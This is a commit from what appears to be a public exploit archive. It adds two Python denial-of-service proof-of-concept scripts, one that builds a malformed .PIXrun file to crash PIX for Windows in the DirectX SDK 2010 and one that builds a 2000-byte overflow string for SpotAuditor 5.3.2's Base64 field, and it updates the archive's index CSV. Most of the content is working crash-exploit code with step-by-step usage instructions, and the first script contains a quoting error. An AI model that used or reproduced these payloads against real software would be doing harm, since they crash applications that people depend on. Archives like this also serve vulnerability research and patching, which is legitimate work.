DB: 2019-11-28

2 changes to exploits/shellcodes Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC) SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)
2019-11-28 05:01:42 +00:00 · 2019-11-28 05:01:42 +00:00 · a8008a9f3b
commit a8008a9f3b
parent 5543ae6e2e
3 changed files with 81 additions and 0 deletions
--- a/exploits/windows/dos/47718.py
+++ b/exploits/windows/dos/47718.py
@ -0,0 +1,48 @@
+#Exploit Title: Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-26
+#Vendor Homepage : https://www.microsoft.com/
+#Link Software : https://www.microsoft.com/en-us/download/details.aspx?id=681
+#Tested on OS: Windows 7
+
+Proof of Concept (PoC):
+=======================
+
+1.Download and install Microsoft DirectX SDK
+2.Open the PIX for Windows tools 
+2.Run the python operating script that will create a file (poc.PIXrun)
+3.Run the software "File -> Open File -> Add the file (.PIXrun) "
+4.PIX for Windows Crashed
+
+#!/usr/bin/python
+
+DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
+
+poc = DoS
+file = open("poc.PIXrun,"w")
+file.write(poc)
+file.close()
+
+print "POC Created by ZwX"
--- a/exploits/windows/dos/47719.py
+++ b/exploits/windows/dos/47719.py
@ -0,0 +1,31 @@
+#Exploit Title: SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)
+#Exploit Author : ZwX
+#Exploit Date: 2019-11-26
+#Vendor Homepage : http://www.nsauditor.com/
+#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
+#Tested on OS: Windows 7
+
+
+'''
+Proof of Concept (PoC):
+=======================
+
+1.Download and install SpotAuditor
+2.Run the python operating script that will create a file (poc.txt)
+3.Run the software "Tools -> Base64 Encrypted Password
+4.Copy and paste the characters in the file (poc.txt)
+5.Paste the characters in the field 'Base64 Encrypted Password' and click on 'Decrypt'
+6.SpotAuditor Crashed
+'''
+#!/usr/bin/python
+
+http = "http//"
+buffer = "\x41" * 2000
+
+
+poc = http + buffer 
+file = open("poc.txt","w")
+file.write(poc)
+file.close()
+ 
+print "POC Created by ZwX"
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6609,6 +6609,8 @@ id,file,description,date,author,type,platform,port
 47711,exploits/windows/dos/47711.py,"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)",2019-11-25,chuyreds,dos,windows,
 47716,exploits/ios/dos/47716.py,"iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)",2019-11-26,"Ivan Marmolejo",dos,ios,
 47717,exploits/windows/dos/47717.py,"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)",2019-11-26,chuyreds,dos,windows,
+47718,exploits/windows/dos/47718.py,"Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows,
+47719,exploits/windows/dos/47719.py,"SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,